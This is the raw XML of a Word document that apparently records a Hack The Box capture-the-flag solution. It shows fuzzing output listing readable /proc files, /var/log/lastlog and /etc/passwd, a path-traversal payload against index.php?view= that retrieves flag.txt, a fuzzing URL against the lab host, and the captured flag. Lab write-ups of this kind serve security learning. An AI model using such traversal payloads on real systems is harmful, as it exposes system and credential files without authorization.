      <w:r>
        <w:t>/proc/mounts            [Status: 200, Size: 4735, Words: 625, Lines: 78, Duration: 310ms]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27E978F6" w14:textId="77777777" w:rsidR="00A60D13" w:rsidRDefault="00A60D13" w:rsidP="00A60D13">
      <w:r>
        <w:t>/proc/net/dev           [Status: 200, Size: 2382, Words: 757, Lines: 60, Duration: 306ms]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42D24DC8" w14:textId="77777777" w:rsidR="00A60D13" w:rsidRDefault="00A60D13" w:rsidP="00A60D13">
      <w:r>
        <w:t>/proc/net/tcp           [Status: 200, Size: 2085, Words: 587, Lines: 57, Duration: 308ms]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18FED863" w14:textId="77777777" w:rsidR="00A60D13" w:rsidRDefault="00A60D13" w:rsidP="00A60D13">
      <w:r>
        <w:t>/proc/net/route         [Status: 200, Size: 2319, Words: 729, Lines: 59, Duration: 322ms]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03C00292" w14:textId="77777777" w:rsidR="00A60D13" w:rsidRDefault="00A60D13" w:rsidP="00A60D13">
      <w:r>
        <w:t>/proc/partitions        [Status: 200, Size: 2052, Words: 561, Lines: 61, Duration: 303ms]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="782F3BC8" w14:textId="77777777" w:rsidR="00A60D13" w:rsidRDefault="00A60D13" w:rsidP="00A60D13">
      <w:r>
        <w:t>/proc/self/cmdline      [Status: 200, Size: 1967, Words: 515, Lines: 56, Duration: 304ms]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47154FF5" w14:textId="77777777" w:rsidR="00A60D13" w:rsidRDefault="00A60D13" w:rsidP="00A60D13">
      <w:r>
        <w:t>/proc/version           [Status: 200, Size: 2123, Words: 535, Lines: 57, Duration: 285ms]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17A93DDA" w14:textId="77777777" w:rsidR="00A60D13" w:rsidRDefault="00A60D13" w:rsidP="00A60D13">
      <w:r>
        <w:t>/proc/self/status       [Status: 200, Size: 3343, Words: 608, Lines: 113, Duration: 285ms]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52B6917C" w14:textId="77777777" w:rsidR="00A60D13" w:rsidRDefault="00A60D13" w:rsidP="00A60D13">
      <w:r>
        <w:t>/var/log/lastlog        [Status: 200, Size: 294227, Words: 515, Lines: 56, Duration: 288ms]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40F83237" w14:textId="77777777" w:rsidR="00A60D13" w:rsidRDefault="00A60D13" w:rsidP="00A60D13">
      <w:r>
        <w:t>///////../../../etc/passwd [Status: 200, Size: 3309, Words: 526, Lines: 82, Duration: 299ms]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="465C1EB8" w14:textId="0CAB3E9A" w:rsidR="00A60D13" w:rsidRDefault="00A60D13" w:rsidP="00A60D13">
      <w:r>
        <w:t>:: Progress: [929/929] :: Job [1/1] :: 130 req/sec :: Duration: [0:00:07] :: Errors: 0 ::</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67BD7B75" w14:textId="41CCDF71" w:rsidR="00A60D13" w:rsidRDefault="00A60D13" w:rsidP="00A60D13">
      <w:r>
        <w:t>```</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E8F687C" w14:textId="77777777" w:rsidR="001733D5" w:rsidRDefault="001733D5" w:rsidP="00340F39"/>
    <w:p w14:paraId="308A2C0D" w14:textId="77777777" w:rsidR="001733D5" w:rsidRDefault="001733D5" w:rsidP="00340F39"/>
    <w:p w14:paraId="135BBE27" w14:textId="77777777" w:rsidR="001733D5" w:rsidRDefault="001733D5" w:rsidP="00340F39"/>
    <w:p w14:paraId="64367D11" w14:textId="77777777" w:rsidR="001733D5" w:rsidRDefault="001733D5" w:rsidP="00340F39"/>
    <w:p w14:paraId="6578B703" w14:textId="77777777" w:rsidR="001733D5" w:rsidRDefault="001733D5" w:rsidP="00340F39"/>
    <w:p w14:paraId="3CA5A1D5" w14:textId="77777777" w:rsidR="001733D5" w:rsidRDefault="001733D5" w:rsidP="00340F39"/>
    <w:p w14:paraId="57C70332" w14:textId="77777777" w:rsidR="001733D5" w:rsidRDefault="001733D5" w:rsidP="00340F39"/>
    <w:p w14:paraId="221AEB90" w14:textId="119D97A6" w:rsidR="001733D5" w:rsidRDefault="001733D5" w:rsidP="00340F39">
      <w:r>
        <w:t>```bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F0B0F37" w14:textId="1B92B2C7" w:rsidR="001733D5" w:rsidRDefault="001733D5" w:rsidP="00340F39">
      <w:r w:rsidRPr="001733D5">
        <w:t>/index.php?view=../../../../../../../../../../../../../../../../../../../flag.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65BC5394" w14:textId="26A34DA7" w:rsidR="001733D5" w:rsidRDefault="001733D5" w:rsidP="00340F39">
      <w:r>
        <w:t>```</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F5D9223" w14:textId="4669827C" w:rsidR="001733D5" w:rsidRDefault="001733D5" w:rsidP="00340F39">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="58BFB33A" wp14:editId="2120E1DA">
            <wp:extent cx="5943600" cy="1958340"/>
            <wp:effectExtent l="0" t="0" r="0" b="3810"/>
            <wp:docPr id="1391986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867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0693" w14:textId="2AF3EA75" w:rsidR="005C2D30" w:rsidRDefault="005C2D30" w:rsidP="00340F39">
      <w:r>
        <w:t>P/s:</w:t>
      </w:r>
      <w:r w:rsidRPr="005C2D30">
        <w:t xml:space="preserve"> HTB{4u70m47!0n_f!nd5_#!dd3n_93m5}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BA7D846" w14:textId="07F9B4E6" w:rsidR="001733D5" w:rsidRDefault="001733D5" w:rsidP="00340F39"/>
    <w:sectPr w:rsidR="00173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A41C1B"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="8376C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93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956"/>
    <w:rsid w:val="000C7F71"/>
    <w:rsid w:val="001733D5"/>
    <w:rsid w:val="00291511"/>
    <w:rsid w:val="00340F39"/>
    <w:rsid w:val="003A3425"/>
    <w:rsid w:val="004D4881"/>
    <w:rsid w:val="004E1271"/>
    <w:rsid w:val="005C2D30"/>
    <w:rsid w:val="006B12B5"/>
    <w:rsid w:val="00757DBC"/>
    <w:rsid w:val="007D5956"/>
    <w:rsid w:val="009247C2"/>
    <w:rsid w:val="00A60D13"/>
    <w:rsid w:val="00C5152C"/>
    <w:rsid w:val="00F3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E8F73"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{9CB8D713-AE51-4749-9DDB-76D75E616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9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59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59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59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59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59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59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59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59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9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59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59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59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59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59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59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59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59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59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59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59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59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59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59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59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59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59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59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595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15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5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83.136.248.110:48936/index.php?view=../../../../../../../../../../../../../../../../../../../FUZZ/index.ph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1260</Words>
  <Characters>7184</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>59</Lines>
  <Paragraphs>16</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company/>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>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Quoc Khanh D21AT03</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Ly Quoc Khanh D21AT03</cp:lastModifiedBy>
  <cp:revision>14</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-02-05T03:47:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-02-05T04:15:00Z</dcterms:modified>
</cp:coreProperties>
</file>